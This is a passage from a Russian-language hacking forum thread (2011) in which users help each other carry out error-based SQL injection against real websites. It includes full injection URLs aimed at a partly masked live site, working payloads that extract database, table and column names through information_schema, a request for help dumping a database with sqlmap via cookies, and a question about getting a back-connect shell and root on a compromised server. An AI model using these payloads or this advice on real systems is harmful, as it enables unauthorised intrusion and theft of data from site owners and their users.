Старый 26.07.2011, 17:53   #1161
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от durito Посмотреть сообщение
вопрос

Error Based SQLi
http://www.***.com/babble/main.asp?topic_id=9%27+or%201%20group%20by%20conca t%28user%28%29,floor%28rand%280%29*2%29%29%20havin g%20min%280%29%20or%201/*&tsubject=Travel

5 ветка но почему-то нет возможности просматривать таблицы и колонки

http://www.***.com/babble/main.asp?topic_id=9%27+or%201%20group%20by%20conca t%28%28select%20count%28*%29%20from%20information_ schema.tables%29,floor%28rand%280%29*2%29%29%20hav ing%20min%280%29%20or%201+--+&tsubject=Travel

выдает количество таблиц, а вот содержимое не выводиться.
Цитата:
Type mismatch
т.е. скрипт проверяет что возвращаемое значение = число

Последний раз редактировалось Twost; 17.05.2013 в 11:55..
Tim вне форума   Ответить с цитированием
Старый 27.07.2011, 02:52   #1162
id13
 
Регистрация: 04.12.2010
Сообщений: 22
Репутация: 1
По умолчанию

запрос вида
select count(schema_name) from information_schema.SCHEMATA limit 1 - выдает норм данные
а вот
select schema_name from information_schema.SCHEMATA limit 1 - выдает пустую страницу
тоже самое и с таблицами и с колонками.

Как быть?
id13 вне форума   Ответить с цитированием
Старый 27.07.2011, 07:17   #1163
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от id13 Посмотреть сообщение
запрос вида
select count(schema_name) from information_schema.SCHEMATA limit 1 - выдает норм данные
а вот
select schema_name from information_schema.SCHEMATA limit 1 - выдает пустую страницу
тоже самое и с таблицами и с колонками.

Как быть?
Возможно select hex(schema_name) from information_schema.SCHEMATA limit 1
nikp вне форума   Ответить с цитированием
Старый 27.07.2011, 14:14   #1164
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

помогите разобраться с утилитой sqlmap

не получается с её помощью сдампить БД (оддин столбец) через инъекцию (MSSQL) с использованием кукисов

покажите плз рабочий пример как это делается
opium вне форума   Ответить с цитированием
Старый 27.07.2011, 14:29   #1165
Vollkorn
 
Регистрация: 24.03.2011
Сообщений: 16
Репутация: 5
По умолчанию

Цитата:
Сообщение от opium Посмотреть сообщение
помогите разобраться с утилитой sqlmap

не получается с её помощью сдампить БД через инъекцию (MSSQL) с использованием кукисов

покажите плз рабочий пример как это делается
http://sqlmap.sourceforge.net/doc/README.html
Vollkorn вне форума   Ответить с цитированием
Старый 27.07.2011, 14:40   #1166
opium
 
Аватар для opium
 
Регистрация: 10.09.2010
Сообщений: 37
Репутация: 0
По умолчанию

спасибо конечно, но я читал. Не выходит, поэтому хочу чтобы скинули что на реальном примере
opium вне форума   Ответить с цитированием
Старый 27.07.2011, 17:04   #1167
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

На шелле права NOBODY, то бишь ни бинд, ни бекконнэкт не работают...к перлу и к gcc соответственно доступа нет (хоть и тот же sm=off). а ядро там 2006 года
есть возможности коннекта/рута?
Cross вне форума   Ответить с цитированием
Старый 27.07.2011, 17:24   #1168
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 86
Репутация: 0
По умолчанию

Собственно вопрос:
метод Error Based MySQLi /path/to/script?id=1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--

а как же будеть другие запросы кроме определения версии? Например смотреть colonka(1,2,3,4,5) s tablici tablica2?
Вот такой вот вопросик))
YuNi|[c вне форума   Ответить с цитированием
Старый 27.07.2011, 17:34   #1169
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

YuNi|[c, подзапрос вместо version()
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 27.07.2011, 22:16   #1170
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

YuNi|[c

or 1 group by concat((select concat(0x3a,table_name,0x3a) from information_schema.tables limit 1,1),floor(rand(0)*2)) having min(0) or 1
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot